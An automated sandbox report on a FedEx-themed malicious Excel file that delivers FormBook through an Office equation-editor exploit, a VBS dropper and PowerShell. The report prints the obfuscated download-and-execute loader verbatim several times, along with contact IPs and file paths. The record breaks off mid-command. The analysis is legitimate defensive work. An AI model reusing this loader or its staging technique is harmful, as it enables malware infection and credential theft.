Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FedEx Receipt_53065724643.xls

Overview

General Information

Sample name:FedEx Receipt_53065724643.xls
Analysis ID:1465865
MD5:4bb5a21106d460a7e9f63d44e47359cc
SHA1:bb87ff08d79ebb57f97f97407db083bb13bb580d
SHA256:adf19fed5bdfe80fc084a7ff1ad2ba59dc986dfe5b7dd7d2864c129bce51c0a0
Tags:FedExxls
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell Download and Execute IEX
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1220 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3288 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3504 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3616 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • RegAsm.exe (PID: 3824 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
    • AcroRd32.exe (PID: 3884 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1f65:$obj2: \objdata
  • 0x1f4b:$obj3: \objupdate
  • 0x1f23:$obj5: \objautlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1f65:$obj2: \objdata
  • 0x1f4b:$obj3: \objupdate
  • 0x1f23:$obj5: \objautlink
SourceRuleDescriptionAuthorStrings
0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2dd73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x174b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a970:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x140af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      Process Memory Space: powershell.exe PID: 3688JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        12.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          12.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dd73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x174b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          12.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            12.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cf73:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x166b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Exploits

            barindex
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.95.235.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3504, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49174
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3504, TargetFilename: C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49174, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3504, Protocol: tcp, SourceIp: 23.95.235.16, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar
            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 41.216.183.13, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49175
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1220, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , ProcessId: 3616, ProcessName: wscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1220, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" , ProcessId: 3616, ProcessName: wscript.exe
            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 194.163.41.117, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1220, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 41.216.183.13, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49175
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1220, Protocol: tcp, SourceIp: 194.163.41.117, SourceIsIpv6: false, SourcePort: 80
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and 